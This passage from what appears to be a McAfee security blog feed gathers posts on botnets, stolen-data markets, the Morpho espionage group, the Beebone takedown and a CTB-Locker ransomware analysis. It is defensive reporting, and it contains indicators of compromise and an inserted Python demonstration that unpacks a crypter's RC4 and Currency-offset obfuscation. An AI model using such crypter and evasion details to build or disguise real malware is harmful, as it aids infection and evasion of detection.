Dr. Shook is well-known to Fortune 100 global companies for providing experienced leadership in incident analysis and response. He has led small and large teams of forensic investigators and computer and telecommunications systems analysts in many of the most notorious information security breach events of the past two decades. Shook’s experience in financial services and other industries, including standards development, helps McAfee clients understand technology risks in the context of their businesses.
A Dummies Guide to ‘Insider Trading’ via Botnet
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/a-dummies-guide-to-insider-trading-via-botnet/
Fri, 20 Nov 2015 22:44:36 +0000

The post A Dummies Guide to ‘Insider Trading’ via Botnet appeared first on McAfee Blogs.

This post, the first of two parts, was written by Raj Samani, Christiaan Beek, and Shane Shook. 

Want to spread malware? One of the most effective ways is to use a botnet, a network of infected systems. The goals of botnets have barely changed since we first encountered them more than a decade ago. We have often said that fighting cybercrime is a game of cat and mouse, with innovation from each side tipping the balance first one way, and then another. The evolution of botnets is no different.

In addition to common botnets plaguing our home computers to deliver spam or worse, we also find botnets targeting corporations to surreptitiously extract large collections of data to support incredibly profitable campaigns. These campaigns are aided by stolen credentials and the live viewing of (or interaction with) victims’ systems containing confidential information. These steps allow an attacker to get an insider’s view of infected organizations without actually being an insider—all while remaining undetected and manipulating data for financial gain.

In this two-part series we will first examine the evolution of the botnet, and follow up with a second post that shows how this new operating model is being actively used.

Botnet evolution

Originally robot networks were designed and used to enlist as many nodes as possible in criminal campaigns.

Traditional botnets focused on intrusion and data theft to perform the following activities:

  • Remote control of systems.
  • Interruption/denial of service.
  • Personal information theft (identity/personal credit/banking).

Over time, botnets began to incorporate other services:

  • “Doxing”/cataloging/selling stolen information.
  • On-demand targeting and access provisioning to corporate systems.
  • Third-party malware installation (RATs or ransomware) on systems.

Today, botnets provide managed services that include:

  • Anonymous communications routing and publishing.
  • Access management to subscribed networks/computers.
  • Help desk services: including 24/7 technical support.
  • Payment services (for electronic funds transfers or “crypto” currencies transactions).
  • Markets for “dark web” products and services.

The actors behind these botnets, the “botmasters,” use these operations to serve a bigger collective of campaigns by renting access to others, as well as for personal gain.

McAfee recently published the McAfee Labs 2016 Threats Predictions, which included a five-year forecast of the cybersecurity marketplace and its actors. In that article we mention that we do not quite expect the transformation of cybercrime into a full-fledged industry with suppliers, markets, service providers (“cybercrime as a service”), financing, trading systems, and a proliferation of associated business models.

However, this transformation, better described as an evolution, has been primarily a product of botnets, whose botmasters now allow subscribers to request, view, and use protected and sensitive information. As customer needs and desires change, botnet services evolve to meet the demand. Payment for these services is often made in Bitcoin.

Traditional botnets were “owner operated,” but as their financial success and reputation grew, they became organized. The evolution of botnets, from botmasters defining services to subscribers demanding products and services, has led to a customer-oriented industry. Subscribers vary, but their interests are generally reflected by the malware types in modern botnets, which include:

  • Personal information stealers are targeted at consumers, most often through spam or phishing, and seek credentials and other personally identifiable information that facilitates identity and personal financial credit, banking, and trading theft.
  • Corporate information stealers are targeted at corporate employees or officers, commonly through phishing but also supported by social engineering techniques to target individuals or business functions that can facilitate the theft of human resources information, or credentials (and computer access) for financial (ERP/ACH/EFT) fraud and theft. 
  • Market information stealers are delivered via targeted phishing, or through more sophisticated targeting such as “waterholing” (infecting advertisements served to websites frequented by particular industry readers) or business networking services that create trusted links between people on request or via introductions through social media. They are usually aimed at corporate officers of public companies, lawyers or auditors, or employees of financial services institutions and related media services. These information stealers facilitate the theft of protected or sensitive market information that can be used for insider trading.

The malware used are common in their design, differing only in whom they target, which instructions they employ to harvest different types of information, and which control sites they communicate with. Defining the type of crime is no longer about the tool(s) being used, but the evidence of activity. This evidence exists fundamentally in only three places: the control servers where stolen information is stored and made accessible to subscribers, victims’ financial (or trading) accounts where fraud has been conducted, and victims’ computer artifacts where the history of misuse can be assessed. 

Let’s look at some examples. 

Personal information stealer: This tool injects malware into browser processes to collect credentials used to conduct financial or securities transactions with the consumer’s bank. Modern malware types such as Dyre leverage additional features including remote desktop “back connects” that also allow botnet operators or subscribers to use the infected computer to log on to the consumer’s bank sites. Today’s information stealers even incorporate tools to defeat two-factor authentication through screen shots or other techniques.

Corporate information stealer: This method not only harvests credentials in a similar (though expanded) method as with personal information stealers, but the malware also facilitates backdoor access to the corporate network. The malware automatically collects system information about the compromised computer, user credentials and permissions, and—according to other scripted instructions—accessible corporate network information. The botmasters then catalog that information and either conduct additional reconnaissance and exploitation of the compromised corporate computer or network, often installing additional RATs to create multiple and persistent access to the organization, or simply sell the fact that they have access to certain computers in certain corporate estates to willing subscribers. Those subscribers subsequently either direct additional activities if the botmaster provides those services, or use the access for their own purposes.

Watch for part two of this post.

Contributors

We would like to thank the many people involved in this research, including members of the Malware Operations team, the Malware Sample Database team, the Foundstone Incident Response team, and our special coauthor of this research, Dr. Shane Shook.

Dr. Shook is well-known to Fortune 100 global companies for providing experienced leadership in incident analysis and response. He has led small and large teams of forensic investigators and computer and telecommunications systems analysts in many of the most notorious information security breach events of the past two decades. Shook’s experience in financial services and other industries, including standards development, helps McAfee clients understand technology risks in the context of their businesses.
What Is Your Customer Data Worth?
https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/customer-data-worth/
Mon, 09 Nov 2015 19:30:15 +0000

The post What Is Your Customer Data Worth? appeared first on McAfee Blogs.

How to make sense of the market for stolen information.

Personal data about you, me, and, most importantly, your customers is being openly sold via online marketplaces. Stolen data has become a mature commodity market, not unlike oil or metals, with supply-driven price fluctuations, different qualities of product, and a range of values and scarcities. This market has expanded far beyond credit card numbers, mirroring the growth of big data in legitimate organizations.

We recently published a report titled The Hidden Data Economy, detailing key types of information that are available and how much they cost. Since you cannot trust criminals, some of these marketplaces may be scams or may be using reputable brand names to perpetrate a different type of fraud, but that does not reduce the overall impression of a vibrant cybercrime economy.

Credit card numbers and other payment information are the most common stolen data, with the lowest price point and widest range of values. Large scale thefts, the increasing use of chip-and-PIN cards, and rapid response from credit card companies have driven down the value of basic card information. After a big data breach floods the market with new numbers, they may go for only a few dollars each.

However, add in some additional data and the price goes up quickly. Combine payment card information with date of birth, which is a common fraud prevention question, and the value jumps to $15 in the US and about $30 in other major countries. Add in the billing address and the username and password for the account, and the price goes up to between $30 and $45. Many options are available for the discerning criminal, including issuing bank, country, available balance, maximum withdrawal limit, and usability at an ATM, store, or online.

The Stolen Data Value Chain

Credit card numbers are the base metal of stolen data markets — widely available but not worth that much without additional info. Moving up the value chain are account login credentials for payment accounts or banking services, which appear to be priced based on the balance in the account. For less than 5% of the account balance, you can purchase login information for an online payment account. More valuable are full banking services, especially those with the ability to transfer funds to US banks, which sell for about 8% of the balance. Some sellers offer replacements if the purchased account no longer has the advertised balance, while others rely on reputation rankings, purchase feedback, and other common tools of online shopping to reassure customers.

High demand and automated theft operations have made the market for premium content account information attractive and apparently profitable. Whether you want to read some comic books ($0.55), watch online video (up to $1), get access to premium cable channels ($7.50), or watch live professional sports ($15), stolen login credentials are readily available. In an ironic twist, you can even buy stolen credentials to Dark Web markets.

Rare and more specific are logins for individual companies, open vulnerabilities to valuable systems at banks and airlines, access to industrial machines or critical infrastructure, and even stolen enterprise datasets. Just like rare art or jewels, this type of stolen data does not typically carry a direct price tag; instead, value is negotiated between the buyer and seller. Also like stolen art, the prospect of commissioned thefts is probably not very far away, if it is not here already.

With such a significant number of data breaches making headlines over the last two years, it’s not surprising to see so much consumer data for sale. But the wide variety of data and related profit-making schemes never cease to surprise those of us monitoring the Dark Web on an ongoing basis. Beyond the aforementioned stolen data types, you can also find personal identities, social media access, email accounts, medical information, and much more.

I know from direct conversations with organizations that there is quite a bit of apathy on the subject of cybercrime. Even today, after all the headlines, cybercrime still seems intangible. Too many of us still fail to realize cybercrime is simply the digital evolution of crime, and given the widespread apathy, the emergence of an increasingly established hidden data economy is the destination at which we are bound to arrive. It’s a constant and important reminder for those of us committed to making our connected world safe for our connected lives.

View the original post on Dark Reading.

We’ve Been Hacked! Okay, I’ll Deal With It Next Week
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/weve-hacked-okay-ill-deal-next-week/
Thu, 15 Oct 2015 04:01:22 +0000

The post We’ve Been Hacked! Okay, I’ll Deal With It Next Week appeared first on McAfee Blogs.

That was the message I got from a CEO when we presented evidence that their organization had been compromised and the attackers had been free to roam for months, resulting in the theft of terabytes worth of data. Actually, the exact words were “So we’ve been hacked, eh? Well, it’s Friday afternoon now so I will get my IT guy to look into it on Monday.”

This response is not uncommon, and to be fair it is better than the usual indifferent response of “So what?” Yet it is disheartening to act as messenger only to realize that your audience has left the auditorium. It is partly because of this level of apathy that we undertook the research which has resulted in the new report I coauthored with my colleagues Francois Paget and Charles McFarland: The Hidden Data Economy: The Marketplace for Stolen Digital Information. Released today, the report highlights what happens with stolen data after a data breach.

In the past, we have covered the concept of “Hacking-as-a-Service,” and although that research did touch on the sale of stolen data—namely credit cards—it just scratched the surface. In this report, we delve deeper into the topic, highlighting ways in which all sorts of stolen data is monetized.

What worries us the most is just how personal some of the data is. Want to be an identity thief? Simply order the person you wish to become. I remember one conversation with law enforcement as we were writing the report. When we uncovered some individuals whose lives were being traded by criminals, we offered advice to the police on what to tell the victims. The conversation went along the lines of “You may not be aware of this, but your entire digital life including that of your family is being sold by criminals somewhere on the Internet.”

This is why data theft matters—it is often very personal. It is easy to talk about cybercrime having something to do with computers, but the reality is that the systems are just objects used in attacks. It matters because it can be about not being able to get a mortgage because someone has destroyed your credit rating. Or about being accused of sending hateful messages via your social media account because someone gained access to your mailbox. The truth is that cyber theft can, and often does, affect peoples’ lives in profound ways.
What Morpho Means: Why Hackers Target Intellectual Property And Business-Confidential Information
https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/morpho-means-hackers-target-intellectual-property-business-confidential-information-2/
Fri, 17 Jul 2015 19:26:32 +0000

The post What Morpho Means: Why Hackers Target Intellectual Property And Business-Confidential Information appeared first on McAfee Blogs.

A quiet, professional cyberespionage group steals what every company wants to keep secret: valuable information that drives business. Welcome to the new normal.

Corporate cyberespionage made the front page yesterday with the news of Morpho, also known as Wild Neutron. Regardless of what you call it, these revelations were the latest reminder of the growing prominence of corporate espionage on the cyber landscape. The group targets major IT, pharmaceutical, legal and commodity companies spanning the globe, with concentrated efforts in the United States, Europe and Canada. They are highly organized, and home in on victims to gather confidential information for future monetization.

The quick and dirty on how Morpho operates: the group’s modus operandi is a combination of watering hole attacks, zero-day exploits and multi-platform malware. They compromise websites pertinent to the target, exploit them and deliver either a Java-based zero-day exploit or a potential Internet Explorer zero-day exploit. Bottom line: this is cyberespionage via zero-day.

What we can draw from this is that they either have the technical know-how to discover zero-days—which is unlikely for a small group, as Morpho is suspected to be—or they have the resources to purchase zero-day exploits on the black market. Such a reliance on what we refer to as the Cybercrime-as-a-Service marketplace would reinforce our assertion that if you are well-resourced, the “services” are available to get into the cybercrime game.

Morpho used custom Remote Access Tools (RATs) to sniff for targeted information or for other computers to infect. This group also installed backdoors allowing infected machines to communicate with C&C servers over encrypted connections. The smartest thing this group did, however, was clean up after itself: once emails and confidential information were stolen, they securely deleted files and event logs. It was as if they had never broken in.

It is because of this careful cleanup and precise execution of zero-days that Morpho has successfully operated since 2011. But Morpho’s success can be attributed to one thing above all: its single-minded and professional approach to compromising, extracting and leveraging business confidential information (BCI) and intellectual property (IP).

Each is valuable to hackers and can spell trouble for any business if they are lost to competitors.

Intellectual property—any work or invention originating from a creative source, from art, books, designs, images, logos, and company names to source code, product designs, pharmaceutical formulas, and building blueprints—is as much an asset as financial resources, property, or physical product. Massive resources are allocated to developing complex products and unique concepts, and their loss amounts to billions for the companies working to develop ideas that boldly impact the future.

Large industries, like pharmaceutical, chemical, and technology — the very industries targeted by Morpho — are popular targets because their IP is easily reproduced or monetized. But smaller, disruptive companies, developing new ideas, technologies, and products to challenge existing businesses and entire industries, are by no means immune to such cyber-attacks.

To what cost? That’s difficult to quantify for obvious reasons. If a factory burns down, a public company is obligated to reflect that loss in its financial statements. Cyberespionage crimes are as difficult to quantify in cost as they often are to detect. But the U.S. Department of Commerce has estimated IP theft of all kinds (not just cybercrime) as a $200 to $250 billion annual hit to U.S. companies. The Organization for Economic Development (OECD) estimates that counterfeiting and piracy costs companies as much as $638 billion a year. Such numbers have prompted McAfee Labs to conclude that cyberespionage breaches are the “Crimes of the Century”—they impact both society’s present and future economics and progress.

Business confidential information, which could include investment data, resource exploration data, and sensitive commercial data such as trade secrets, processes, contracts, and operational information, is almost always valuable and actionable, making it an attractive target.

Not too long ago, business confidential information was at the center of a sports-related cyberespionage case involving two professional baseball teams: the St. Louis Cardinals and the Houston Astros. As we saw there and are seeing again with Morpho, information pertinent to business plans, contracts, and transactions is as valuable a commodity as intellectual property, if not more so. By gaining access to confidential information, Morpho and similar cybercriminals gain insight into an organization, discovering information that can be leveraged to pre-empt critical business transactions, product announcements, and investment news.

The Morpho group has succeeded because they have laser-like precision in what they’re looking for and how they go about getting it. Regardless of intention, tactics used, or business model, the main point is that one key common denominator is driving this sort of cybercrime: the value of information that drives business.

And, as the world’s economies grow increasingly dependent on information as critical capital, cyberespionage is simply part of the global competitive landscape upon which businesses are competing today. The Morpho and Wild Neutron revelations suggest that any other assessment by executive suites—anything less than the business critical need to protect IP and BCI—is dangerously naïve.

For more information on the cost of cybercrimes such as espionage, please see the McAfee report with the Center for Strategic and International Studies (CSIS) on the economic impacts of cybercrime and cyberespionage.

View the original post on Dark Reading.

The post What Morpho Means: Why Hackers Target Intellectual Property And Business-Confidential Information appeared first on McAfee Blogs.

Update on the Beebone Botnet Takedown
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/beebone-update/
Mon, 20 Apr 2015 22:40:21 +0000

On April 8, the takedown operation for the polymorphic botnet known as Beebone successfully concluded. This action redirected traffic from infected hosts to a sinkhole operated by the Shadowserver Foundation. In addition to halting additional infections and the continued morphing of the W32/Worm-AAEH worm, the sinkhole allows McAfee Labs and other partners in the takedown to better understand the scope and complexity of the Beebone operation. We now have a more accurate count of infected hosts, we have identified additional indicators of compromise, and we have greater visibility into the botnet’s geographic reach.

Obfuscation capabilities

The sinkhole has revealed multiple obfuscation techniques. One mechanism is the botnet’s polymorphic nature, which guarantees unique samples for every download request. The actors behind Beebone went the extra mile by replacing the base worm sample multiple times per day. For example, from March to July 2014, the Beebone control server served at least one new sample every day (we conclude with 93.6% confidence) with up to four variant changes per day.

The worm switched from its custom crypter to the underground “29A Loader” crypter on July 21, 2014, losing all of its server-side polymorphism capabilities. To make up for the lost variety of distributed samples, the attackers replaced an average of eight variants per day, with 35 variant replacements on the same day the packer changed.

Although the samples were functionally similar across variants, the top-level crypter was consistently modified to change its final binary code. Some of the changes are listed below.

Third-party open-source software

Some of these samples included the entire “Wizard-TemplateXP” UI library, originally located at http://en.pudn.com/downloads27/sourcecode/windows/control/detail85571_en.html. We can verify this by comparing strings from the UI library source code to the W32/Worm-AAEH binaries. (See following images.)

These samples include:

  • b6e232d8ac1841fa87ebbd15bebec1ce
  • c880bd52cfaf3206f95eb49b5d51f1c657b7aa82
  • 15fc526edc6a5c665accfae06f8609c5cc93ac30
  • 449c870a9d5012a1cb6279638291de51e551490d

[Image: 20150420 Beebone 1]

Change in encryption keys

Another obfuscation technique is the use of the RC4 encryption algorithm to generate encrypted strings (prior to December 2013) and binaries (after December 2013). For any given base W32/Worm-AAEH crypter stub (which the polymorphic engine uses to mutate and generate other samples), the RC4 key is composed of the original project name concatenated with a hardcoded number treated as a string. Although the polymorphic engine randomizes the project name on each mutation, it keeps the hardcoded number intact, allowing us to identify base variants generated by the polymorphic engine. However, some samples introduce an additional round of RC4 encryption with a one-character string, starting from “0” and stopping at “9” before moving to a new obfuscation technique.

Sample                              Additional RC4 round
0d796cd23d03500879799f586136d548    “1” as first key
14c761471b2659d5a63cfee50eca029d    “2” as first key
14fe9b39dbe3017c2a6351b49f5a344a    “3” as first key
a9d385ac73119c26f62f312801d46499    “4” as first key
ebf2de1a6552b0342d57286472ff7200    “5” as first key
1340319fc03aa4313651301814d0d635    “6” as first key
1344557ff83e92384894f7f7f8b94fbd    “7” as first key
158e28794b970a477c5cf01a402bf3f0    “8” as first key

Change in fields needed for decryption
On December 12, 2013, dependence on the project name was removed entirely. After that date, samples could use any string present in the sample as the RC4 key to decrypt the final payload. The intent of this change was likely to make static detection by antimalware scanners more difficult. This approach was used until March 31, 2014. After that day, the crypter began to use position-independent code (for example, 6620235fced076d1d7ce9b1c7c58967b) to partially implement its unpacking functionality. An additional layer of obfuscation was added on April 14, 2014, when the data type of variables storing the location of encrypted data changed from an integer to a “currency” type, which is native to the Visual Basic 6 language. Although this was a simple change in the crypter source code, its effect on final binaries is immense. Instead of having the location appear directly in a binary as a 32-bit value, with a currency type it appears as the original value multiplied by 10,000. However, each sample unevenly splits the number into two separate numbers, requiring addition or subtraction (followed by a division by 10,000) to retrieve the location of the encrypted data (for example, b1121d10573440735f0db22b85a4a634). Although antimalware scanners can still detect these samples, it is more difficult.
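The two crypter tricks described above (an RC4 key built from the project name plus a hardcoded number, optionally wrapped in one extra single-digit RC4 round, and a payload offset hidden as two VB6 Currency constants) can be illustrated with a small unpacker. The following Python is an added example, not McAfee's analysis code, and it does not parse the real W32/Worm-AAEH format: the sample layout, the "MZ" plaintext check and the ordering of the extra digit round are assumptions made here for the demonstration, and the sample it unpacks is constructed by the script itself.

```python
"""Toy unpacker for a CONSTRUCTED sample layout (an assumption made for this
example; it is not the real W32/Worm-AAEH crypter format) that mimics two of the
obfuscation tricks described above:

  - the RC4 key is <project name> + <hardcoded number as a string>, optionally
    wrapped in one extra RC4 round keyed with a single digit "0".."9";
  - the payload offset is hidden as two VB6 Currency constants (value x 10,000)
    that must be added or subtracted and then divided by 10,000.

Assumed toy layout (little-endian):
  0x00  int64 Currency A
  0x08  int64 Currency B
  0x10  NUL-terminated project name, then NUL-terminated number string
  loc   RC4-encrypted payload; the plaintext is assumed to start with "MZ"
"""
import struct
from typing import List, Optional, Tuple

CURRENCY_SCALE = 10_000          # VB6 Currency keeps value * 10,000 in an int64
HEADER_LEN = 16
DIGIT_KEYS = [str(d).encode() for d in range(10)]


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same operation."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def currency_candidates(a: int, b: int, size: int) -> List[int]:
    """Offsets hidden as two Currency constants: (a + b) / 10,000 or |a - b| / 10,000.
    Only results that are whole numbers inside the file are plausible."""
    found: List[int] = []
    for raw in (a + b, abs(a - b)):
        if raw % CURRENCY_SCALE == 0:
            loc = raw // CURRENCY_SCALE
            if 0 < loc < size and loc not in found:
                found.append(loc)
    return found


def pack_toy_sample(payload: bytes, project: bytes, number: bytes,
                    digit: Optional[bytes] = None) -> bytes:
    """Build a constructed sample so there is something to unpack (test data only)."""
    strings = project + b"\x00" + number + b"\x00"
    loc = HEADER_LEN + len(strings)
    raw = loc * CURRENCY_SCALE
    a = raw * 2 // 3 + 1              # uneven split; recovered by addition
    b = raw - a
    body = rc4(project + number, payload)
    if digit is not None:             # optional outer round with a one-digit key
        body = rc4(digit, body)
    return struct.pack("<qq", a, b) + strings + body


def unpack_toy_sample(blob: bytes) -> Optional[Tuple[bytes, str, Optional[str]]]:
    """Return (payload, hardcoded number, digit key or None), or None on failure.
    The number is what survives the polymorphic engine's renaming of the project,
    so it is the value worth clustering samples on."""
    a, b = struct.unpack_from("<qq", blob, 0)
    end1 = blob.index(b"\x00", HEADER_LEN)
    end2 = blob.index(b"\x00", end1 + 1)
    project, number = blob[HEADER_LEN:end1], blob[end1 + 1:end2]
    key = project + number
    for loc in currency_candidates(a, b, len(blob)):
        cipher = blob[loc:]
        # Try the bare key first, then each single-digit outer round.
        for digit in [None] + DIGIT_KEYS:
            inner = cipher if digit is None else rc4(digit, cipher)
            plain = rc4(key, inner)
            if plain.startswith(b"MZ"):
                return plain, number.decode(), None if digit is None else digit.decode()
    return None


if __name__ == "__main__":
    sample = pack_toy_sample(b"MZ constructed payload", b"Project1", b"48329", b"3")
    print(unpack_toy_sample(sample))
```

The point of `currency_candidates` is that the Currency scaling gives the analyst a cheap plausibility filter: a sum or difference that is not a multiple of 10,000, or that lands outside the file, cannot be the location. The point of returning the hardcoded number is the one the text makes: the project name changes on every mutation, the number does not, so it is the stable handle for grouping samples from the same base variant.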

Control server architecture
The control servers behind W32/Worm-AAEH used a MariaDB database (a MySQL alternative) along with the Webmin web-based database administration tool (an alternative for phpMyAdmin) to store and maintain data stolen from infected systems. It is likely that they remotely controlled their servers using the Secure Shell (SSH) tool.

[Image: 20150420 Beebone 2]

The Webmin interface for a control server used in August 2014.

The domains for the control servers were prefixed with “ns1.” to masquerade as DNS name servers. To make the deception appear authentic, the port used for DNS queries (53) was left open even though no name resolution took place.

The attackers changed the control server names more than five times a month on average, as shown in the table below.

Date Ranges for Control Server Names

01-MAR-2014 to 12-MAR-2014
12-MAR-2014 to 17-MAR-2014
17-MAR-2014 to 19-MAR-2014
19-MAR-2014 to 21-MAR-2014
21-MAR-2014 to 22-MAR-2014
25-MAR-2014 to 27-MAR-2014
27-MAR-2014 to 31-MAR-2014
31-MAR-2014 to 04-APR-2014
05-APR-2014 to 08-APR-2014
08-APR-2014 to 28-APR-2014
29-APR-2014 to 02-MAY-2014
03-MAY-2014 to 08-MAY-2014
08-MAY-2014 to 20-MAY-2014
20-MAY-2014 to 22-MAY-2014
23-MAY-2014 to 26-MAY-2014
28-MAY-2014 to 01-JUN-2014
02-JUN-2014 to 03-JUN-2014
03-JUN-2014 to 07-JUN-2014
09-JUN-2014 to 12-JUN-2014
13-JUN-2014 to 17-JUN-2014
20-JUN-2014 to 25-JUN-2014
27-JUN-2014 to 28-JUN-2014
03-JUL-2014 to 07-JUL-2014
07-JUL-2014 to 22-JUL-2014
22-JUL-2014 to 24-JUL-2014
25-JUL-2014 to 05-AUG-2014
06-AUG-2014 to 12-AUG-2014
12-AUG-2014 to 14-AUG-2014
14-AUG-2014 to 16-AUG-2014
16-AUG-2014 to 24-AUG-2014
28-AUG-2014 to 01-SEP-2014
02-SEP-2014 to 23-SEP-2014
24-SEP-2014 until Takedown

Sinkhole results

These actions illustrate some of the mechanisms used to obfuscate the infection. As a result, we underestimated the scale of the Beebone botnet. Overnight reports from the Shadowserver team show that the scale of the botnet is about three times greater than earlier estimates.
Date        Unique IP Addresses   Unique Geographies
2015-04-15  37,828                150
2015-04-14  37,089                145
2015-04-13  37,243                150
2015-04-12  32,200                147
2015-04-11  33,984                144
2015-04-10  34,899                149
2015-04-09  34,314                150
2015-04-08  15,454                140

Although this data shows about 34,000 unique IP addresses per day, it does not mean that there are 34,000 infected computers, as some people may connect for research purposes and other systems may be turned off. We hope to see the number of unique connections to the sinkhole decline as remediation begins to take effect.

We would like to thank and recognize F-Secure, Trend Micro, and Symantec for also developing removal tools for W32/Worm-AAEH.

I am indebted to my colleague Sanchit Karve for his assistance with this post. Sanchit (@s_karve) and Raj (@Raj_samani) can also be found on Twitter.

The post Update on the Beebone Botnet Takedown appeared first on McAfee Blogs.

Takedown Stops Polymorphic Botnet
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/takedown-stops-polymorphic-botnet/
Thu, 09 Apr 2015 18:43:04 +0000

Several global law enforcement agencies—with assistance from McAfee—this week successfully dismantled the “Beebone” botnet behind a polymorphic worm known by McAfee as W32/Worm-AAEH. The purpose of this worm is to facilitate downloading other malware, including ZBot banking password stealers, Necurs and ZeroAccess rootkits, Cutwail spambots, fake antivirus, and ransomware. The worm spreads quickly to new machines and contains a cyclic update routine to replace itself with newer versions that increase the likelihood the worm will remain undetected by security software.

McAfee is aware of more than 5 million unique W32/Worm-AAEH samples. In September 2014, McAfee Labs telemetry detected more than 100,000 infections on systems in 195 countries with the majority in the United States. More recently, the number of infected systems McAfee Labs detected dropped to 12,000, largely due to our products’ effectiveness in blocking these attacks.

The botnet takedown, known as Operation Source, was led by Europol’s European Cybercrime Centre (EC3) and the Joint Cybercrime Action Taskforce (J-CAT). Most EU member states and law enforcement partners around the world coordinated in the action. The Dutch High Tech Crime Unit led the J-CAT effort. The U.S. Federal Bureau of Investigation provided valuable support.

The J-CAT is an effective multilateral platform established to fight cybercrime. The J-CAT works together on an operational level with public and private entities and academia to identify and mitigate the biggest cyber threats around the world and apprehend the persons responsible for them.

McAfee, along with Kaspersky Lab and Shadowserver, also provided assistance for this takedown. Shadowserver brought technical investigative skills and a rich set of information about the worm and its supporting botnet. More about the worm and botnet can be found in the McAfee Labs report Catch Me If You Can: Antics of a Polymorphic Botnet.

Dismantling the botnet’s communications infrastructure is only part of the response. Infected system remediation is equally important. Evasive steps taken by the botnet made this particularly difficult. The botnet not only changes the worm’s fingerprint many times every day, but it also actively blocks connections to security vendor websites (including mcafee.com). This is illustrated in the following image:

[Image: Poly botnet 2]

Because W32/Worm-AAEH blocks connections to security software providers, those infected may have difficulty following links to download removal tools. To overcome that hurdle, the team at Shadowserver, whose support was critical to this operation, has made a webpage available from which these tools can be directly downloaded. McAfee customers can find a removal tool at http://www.mcafee.com/us/downloads/free-tools/stinger.aspx.

At McAfee, we believe in public-private partnerships. This operation is further evidence that only a combined response is capable of slowing down the ever-growing menace of cybercrime.

The post Takedown Stops Polymorphic Botnet appeared first on McAfee Blogs.

Hacking the Human OS: A Report on Social Engineering
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/hacking-human-os-report-social-engineering/
Thu, 19 Feb 2015 06:00:19 +0000

Why are data breaches so commonplace? From the attacks against the energy sector reported in July 2014[i], with over 1,000 energy companies in North America and Europe reported to have been compromised, to attacks targeting other sectors (e.g. Operation Troy, Operation High Roller, Nightdragon, etc.), it would appear that no sector is immune from data breaches. One common theme amongst these and other attacks is the initial infection vector, namely exploiting the subconscious of a trusted employee. The modus operandi for most of the common data breaches is to leverage some form of social engineering to coerce the user into an action facilitating malware infection.

The prevalence of social engineering in many publicly disclosed cyber-attacks demonstrates either an inherent weakness in the acumen of victims to distinguish malicious communications, or that cybercriminals are using more complex methods to bypass the ‘human firewall’. The answer of course likely lies somewhere in between these two statements, but regardless of the root cause it does demonstrate that the first line of defense is evidently failing. The default position is to blame users as the cause of breaches, which is not entirely fair. Whilst there will be examples where clearly unsafe practices are being employed, our latest whitepaper “Hacking the Human Operating System” demonstrates that the techniques used by attackers bypass the consciousness of their targets and attempt to manipulate victims by leveraging subconscious levers of influence.

The paper reviews the concept of social engineering; the techniques used within many of the recent cyber-attacks, the levers used to influence victims, the communication channels used, and suggested controls to reduce the risk. Much has been written about social engineering. The content of these sources varies widely, from definitions to mitigation. The purpose of the paper is to define the concepts, and introduce mitigations that go beyond simply suggesting that awareness is a panacea.

Unless we address the first line of defense, data breaches will continue to hog our Twitter timelines, and support the ever burgeoning cost of cybercrime.

Twitter: @Raj_Samani

Twitter: @McAfee_Labs

[i] http://www.bbc.co.uk/news/technology-28106478

The post Hacking the Human OS: A Report on Social Engineering appeared first on McAfee Blogs.

The Rise of Backdoor-FCKQ (CTB-Locker)
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/rise-backdoor-fckq-ctb-locker/
Wed, 21 Jan 2015 18:09:16 +0000

By Raj Samani (@Raj_Samani) and Christiaan Beek (@ChristiaanBeek)

In the McAfee Labs Threats Report published in November 2014, Senior Vice President Vincent Weafer commented that 2014 will be remembered as “the year of shaken trust.” Indeed almost every threat measured saw notable increases in Q3 that pointed to a rather ominous 2015.  There was, however, one notable exception: ransomware.

[Image: ransomware]

The preceding figure showed a respite from the threat of ransomware, but as foreseen in the McAfee Labs Threats Predictions, “Ransomware will evolve its methods of propagation, encryption, and the targets it seeks.”

For many, this prediction appears to be ringing true with the rise in Backdoor-FCKQ (aka CTB-Locker), now distributed via multiple channels including IRC, peer-to-peer networks, newsgroup postings, email spam, etc.

Details

“Backdoor-FCKQ” is a new crypto malware delivered through email that encrypts data files on the target system.

It copies itself to the following folder:

  • %temp%\<7 random characters>.exe
  • %temp%\wkqifwe.exe

It also creates a job task containing seven random characters:

  • %windir%\Tasks\cderkbm.job

The following registry keys are added to the system:

  • %ALLUSERSPROFILE%\Application Data\Microsoft\<7 random characters>

It injects code into svchost.exe, and svchost.exe will launch files from the following:

  • %temp%\<7 random characters>.exe

The code injected into svchost.exe will encrypt files with the following extensions:

  • .pdf
  • .xls
  • .ppt
  • .txt
  • .py
  • .wb2
  • .jpg
  • .odb
  • .dbf
  • .md
  • .js
  • .pl

Once a system is infected, the malware displays the following image:

[Image: CTBLocker]

The newly created process creates a mutex named:

  • \BaseNamedObjects\lyhrsugiwwnvnn

An interesting angle in this new round of Backdoor-FCKQ malware is the use of the well-known downloader Dalexis. There are several versions of this downloader. A simple query in our internal database resulted in more than 900 hits of this downloader and variants of it. To circumvent antispam tools, the downloader is hidden in a zip file that contains a zip and eventually unpacks to a .scr (screensaver) file.

The function of the downloader is to download additional malware from certain locations, unpack the Xor-coded malware, and execute it. In this case the additional malware, the CTB, was packed in the file pack.tar.gz:

[Image: code 1] Figure 1: pack.tar.gz.

As we can see from the preceding screenshot, there’s no file header present that represents a known file type. For example, if this were an executable file, the first two characters (aka the magic number) would have been “MZ.” This is one of the ways in which malware authors try to circumvent gateway detection of malware. Other tricks we have seen frequently of late include putting the payload of the malware on Pastebin or GitHub.

In this case, pack.tar.gz used different XOR keys to encrypt parts of the file. Once this puzzle was cracked, the unpacked code of Backdoor-FCKQ is revealed:

[Image: code 2] Figure 2: Unpacked code of Backdoor-FCKQ.

With multiple samples of Backdoor-FCKQ (CTB-Locker) as comparison material, we immediately recognized code parts.
